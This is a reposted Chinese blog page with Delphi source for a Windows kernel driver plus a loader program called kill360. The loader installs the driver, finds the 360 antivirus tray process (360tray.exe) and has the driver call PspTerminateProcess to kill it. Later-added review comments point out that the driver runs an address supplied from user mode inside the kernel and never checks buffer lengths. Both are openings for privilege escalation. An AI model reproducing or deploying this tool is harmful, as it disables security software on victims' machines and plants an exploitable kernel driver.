delphi版PspTerminateProcess驱动源码


本文整理自网络,侵删。

 原理是在ring3搜索PspTerminateProcess地址,再传到ring0,减轻ring0代码的复杂程度

驱动代码:

unit killDriver;
{$HINTS OFF}
{$WARNINGS OFF}
interface

uses
nt_status, ntoskrnl, native, winioctl, fcall, macros;

function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;

implementation

type
{ Request record shared with the user-mode side. The kill360 program declares
  an identical Tsysinfo; field order and sizes must stay in sync or the IOCTL
  payload is misread on the kernel side. }
Tsysinfo = record
MyPspaddress:dword; // kernel address supplied from user mode; DispatchControl calls it directly
PID: DWORD;         // process id handed to PsLookupProcessByProcessId
end;
Psysinfo = ^Tsysinfo;

const
DeviceName = '\Device\mybr'; /// device name (fixed literal, an observable artifact of this driver)
DosDeviceName = '\??\mybr'; /// symbolic link name (opened from user mode as \\.\mybr)

var
g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING; // initialised in _DriverEntry, used again by DriverUnload

type
// Signature the author assumes for PspTerminateProcess(Process, ExitStatus):
// stdcall with a Cardinal result. Nothing on this page verifies that assumption.
TPSPTERPROC = function(Process:pvoid; ExitStatus:Cardinal): Cardinal; stdcall;

/// Handler for IRP_MJ_CREATE and IRP_MJ_CLOSE. Every open and close is accepted
/// without any check and the IRP is completed with STATUS_SUCCESS, so nothing in
/// this routine restricts which callers may obtain a handle to the device.
function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall; /// response to open/close requests: simply report success
begin
p_Irp^.IoStatus.Status := STATUS_SUCCESS; /// set the status to STATUS_SUCCESS
p_Irp^.IoStatus.Information := 0; /// no bytes transferred

IofCompleteRequest(p_Irp, IO_NO_INCREMENT); /// complete the IRP
Result := STATUS_SUCCESS;
end;

/// IRP_MJ_DEVICE_CONTROL handler. Recognises one private IOCTL and, for it,
/// looks up the requested process and calls the address supplied in the input
/// buffer as if it were PspTerminateProcess.
///
/// Review notes (defects visible in this block, left as they are):
///  - dwInputBufferLength is read but never compared with SizeOf(Tsysinfo)
///    before InBuffer^ is dereferenced, so an undersized request can read past
///    the system buffer.
///  - MyPspaddress is taken verbatim from user mode and invoked in kernel mode
///    with no validation. Any caller that can open the device can therefore make
///    the kernel jump to an arbitrary address, which makes a loaded copy of this
///    driver an elevation risk on its own, independent of its intended use.
///  - The NTSTATUS from PsLookupProcessByProcessId is ignored and the EPROCESS
///    reference it returns is never released with ObDereferenceObject: Process
///    is uninitialised when the lookup fails and leaks a reference when it works.
function DispatchControl(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
var
dwIoControlCode: DWORD;
dwInputBufferLength, dwOutBufferLength: DWORD;
status: NTSTATUS;
dwBytesReturned: DWORD;
psl: PIO_STACK_LOCATION;
IOCTL_KILL_PROCESS: DWORD;
pSystemBuffer: Pointer;
InBuffer: Psysinfo;
Process:pvoid;
MyPspTerminateProcess:TPSPTERPROC ;

begin
dwBytesReturned := 0;
psl := IoGetCurrentIrpStackLocation(p_Irp); { pointer to the IRP's current stack location }
dwIoControlCode := psl^.Parameters.DeviceIoControl.IoControlCode; /// control code
dwInputBufferLength := psl^.Parameters.DeviceIoControl.InputBufferLength; /// size of the input buffer (read, never checked)
dwOutBufferLength := psl^.Parameters.DeviceIoControl.OutputBufferLength; /// size of the output buffer (unused)
pSystemBuffer := p_Irp^.AssociatedIrp.SystemBuffer; /// pointer to the input buffer (METHOD_BUFFERED kernel copy)

IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); /// build our control code; must match the user-mode side

if dwIoControlCode = IOCTL_KILL_PROCESS then /// if it is our control code
begin
InBuffer := pSystemBuffer; // no length check against SizeOf(Tsysinfo) here
DbgPrint('PID is:%d', DWORD(InBuffer^.PID));
DbgPrint('MyPspaddress is: %08X ', InBuffer^.MyPspaddress); // debug trace; also exposes the supplied kernel address
PsLookupProcessByProcessId(InBuffer^.PID, process); // status ignored; reference never released
MyPspTerminateProcess :=TPSPTERPROC(dword(InBuffer^.MyPspaddress)); // user-supplied value treated as a kernel function pointer
MyPspTerminateProcess(process,0);
dwBytesReturned := 0; /// size of the data returned to the caller
status := STATUS_SUCCESS;
end else
begin
status := STATUS_INVALID_DEVICE_REQUEST;
end;

p_Irp^.IoStatus.Status := status;
p_Irp^.IoStatus.Information := dwBytesReturned;

IofCompleteRequest(p_Irp, IO_NO_INCREMENT); /// complete the IRP
Result := status;
end;

/// Unload routine: removes the symbolic link created in _DriverEntry and deletes
/// the device object hanging off the driver object. Nothing else is undone here.
procedure DriverUnload(p_DriverObject: PDRIVER_OBJECT); stdcall;
begin
DbgPrint('Driver Unload!'); /// debug trace
IoDeleteSymbolicLink(@g_usSymbolicLinkName); /// delete the symbolic link we created
IoDeleteDevice(p_DriverObject^.DeviceObject); /// delete the device we created
end;

/// Driver entry point: creates the device and its symbolic link, then installs
/// the dispatch routines and the unload routine.
///
/// Review notes:
///  - The interface declaration near the top of the unit carries stdcall; this
///    header does not. NOTE(review): confirm the compiler accepts the mismatch.
///  - DeviceObject below is a local TDeviceObject record rather than a
///    PDEVICE_OBJECT. NOTE(review): check the binding's IoCreateDevice signature;
///    the failure path passes @DeviceObject (the local's address) to
///    IoDeleteDevice, while DriverUnload uses p_DriverObject^.DeviceObject.
///  - No security descriptor or access check is applied to the device; whether
///    unprivileged callers can open \\.\mybr depends on the default device
///    DACL — confirm on the target system.
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
status: NTSTATUS;
DeviceObject: TDeviceObject;
begin

status := STATUS_DEVICE_CONFIGURATION_ERROR; // returned if device or link creation fails
/// initialise the UNICODE_STRING structures
RtlInitUnicodeString(g_usDeviceName, DeviceName);
RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
/// create the device (non-exclusive, FILE_DEVICE_UNKNOWN)
if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
FILE_DEVICE_UNKNOWN, 0, FALSE,
DeviceObject) = STATUS_SUCCESS) then
begin
/// device created
DbgPrint('Create Device Success'); /// debug trace
/// create the symbolic link
if (IoCreateSymbolicLink(@g_usSymbolicLinkName,
@g_usDeviceName) = STATUS_SUCCESS) then
begin
/// symbolic link created: wire up the dispatch table
DbgPrint('Create SymbolicLink Success'); /// debug trace
/// install our own dispatch routines
pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; /// IRP_MJ_CREATE and IRP_MJ_CLOSE share one handler
pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
pDriverObject^.MajorFunction[IRP_MJ_DEVICE_CONTROL] := @DispatchControl; /// handles DeviceIoControl requests
pDriverObject^.DriverUnload := @DriverUnload; /// runs when the driver is unloaded dynamically
status := STATUS_SUCCESS; /// report success
end else /// symbolic link creation failed
begin
DbgPrint('Create SymbolicLink Failed'); /// debug trace
IoDeleteDevice(@DeviceObject); /// delete the device (see note on the DeviceObject local above)
end;
end;
Result := status;
end;

end.

exe部分:

program kill360;

uses
Windows,
SysUtils,
DrvMgr,
TlHelp32,
getpspterminataaddress;

//my blog: http://hi.baidu.com/9908006
const
drName = 'kill'; // service name used by InstallDriver/LoadDriver (DrvMgr unit, not shown)

type
{ Must match the Tsysinfo record declared in killDriver: same field order and
  sizes, since the record is passed to the driver as the IOCTL input buffer. }
Tsysinfo = record
MyPspaddress: dword; // filled from getpspaddress (unit getpspterminataaddress, not shown)
PID: DWORD;          // filled from GetProcessID
end;

var
hDevice: THANDLE;            // handle to \\.\mybr
InBuffer: Tsysinfo;          // request record sent to the driver
dwBytesReturned: DWORD;      // output of DeviceIoControl (driver always sets 0)
IOCTL_KILL_PROCESS: DWORD;   // computed with CTL_CODE; must match the driver's value
dwPID: DWORD;                // id of the process found by name
drPath: string;              // full path of killDriver.sys next to the executable
strProcessName: string;      // image name to look for

{ Case-insensitive test of whether AText ends with ASubText, using the
  user locale via CompareString. A suffix longer than the text is never a match. }
function AnsiEndsText(const ASubText, AText: string): Boolean;
var
  SubLen, TextLen: Integer;
  Tail: PChar;
begin
  SubLen := Length(ASubText);
  TextLen := Length(AText);
  if SubLen > TextLen then
  begin
    Result := False;
    Exit;
  end;
  // Point at the last SubLen characters of AText and compare them with the suffix.
  Tail := PChar(AText) + (TextLen - SubLen);
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, Tail, SubLen,
    PChar(ASubText), SubLen) = CSTR_EQUAL;
end;

/// Returns the id of the first running process whose image name ends with
/// ExeName (case-insensitive, via AnsiEndsText), or 0 if none is found.
///
/// Review notes: the snapshot handle is not checked against
/// INVALID_HANDLE_VALUE before use, and the Boolean results of
/// Process32First/Next are the only failure signal, so an enumeration error is
/// indistinguishable from "not found".
function GetProcessID(ExeName: string): DWORD;
var
sphandle: DWORD; Found: Bool;
PStruct: TProcessEntry32;
begin
Result := 0;
sphandle := CreateToolhelp32Snapshot($00000002, 0); // $00000002 = TH32CS_SNAPPROCESS
PStruct.dwSize := Sizeof(PStruct);
Found := Process32First(sphandle, PStruct);
while Found do
begin
if AnsiEndsText(ExeName, PStruct.szExefile) then
begin
Result := PStruct.th32ProcessID; Break; // first match wins
end;
Found := Process32Next(sphandle, PStruct);
end;
CloseHandle(sphandle);
end;

{ True only on NT 5.1 or 5.2 (Windows XP / Server 2003); False on any other
  platform, version, or when GetVersionEx itself fails. }
function IsXp03(): Boolean;
var
  Info: TOSVersionInfo;
begin
  Result := False;
  Info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Info) then
    Exit;
  if Info.dwPlatformId <> VER_PLATFORM_WIN32_NT then
    Exit;
  if Info.dwMajorVersion = 5 then
    case Info.dwMinorVersion of
      1, 2: Result := True;
    end;
end;

{ Builds an I/O control code the same way the CTL_CODE macro in winioctl.h does:
  device type in bits 16..31, access in bits 14..15, function in bits 2..13,
  transfer method in bits 0..1. }
function CTL_CODE(DeviceType, Func, Method, Access: DWORD): DWORD;
var
  Code: DWORD;
begin
  Code := DeviceType shl 16;
  Code := Code or (Access shl 14);
  Code := Code or (Func shl 2);
  Result := Code or Method;
end;

begin
// Only XP / 2003 are accepted; presumably because the address found by
// getpspaddress is version-specific (that unit is not shown) — confirm.
// Check the OS version; exit if it is not XP or 2003
if not (IsXp03) then exitprocess(0);
// Driver file path: killDriver.sys in the executable's own directory
drPath := ExtractFilePath(paramstr(0)) + 'killDriver.sys';
// Target process name
strProcessName := '360tray.exe';
// Install the driver through the SCM. Return values of InstallDriver/LoadDriver
// are not checked, so the rest of the program runs even if loading failed.
// Service creation, driver load and the open of \\.\mybr are all observable
// from the host.
InstallDriver(drName, PChar(drPath));
// Load the driver
LoadDriver(drName);
dwPID := GetProcessID(strProcessName);
if dwPID <> 0 then
begin
hDevice := CreateFile('\\.\mybr', GENERIC_READ + GENERIC_WRITE, 0, nil, OPEN_EXISTING, 0, 0); /// open the symbolic link
if hDevice <> INVALID_HANDLE_VALUE then
begin
InBuffer.PID := dwPID; //
InBuffer.MyPspaddress := getpspaddress; // address is resolved in user mode and trusted as-is by the driver
IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); /// build the device control code (must equal the driver's)
if not(DeviceIoControl(hDevice, IOCTL_KILL_PROCESS, @InBuffer, sizeof(InBuffer), nil, 0, dwBytesReturned, nil)) then messagebox(0,pchar('通信失败!'),'mybr',0);
end else messagebox(0,pchar('未找到目录设备!'),'mybr',0);
CloseHandle(hDevice); /// close the handle — note this also runs when CreateFile returned INVALID_HANDLE_VALUE
end;
// Unload and uninstall unconditionally, whether or not the IOCTL was sent
UnloadDriver(drName);
UninstallDriver(drName);
end.
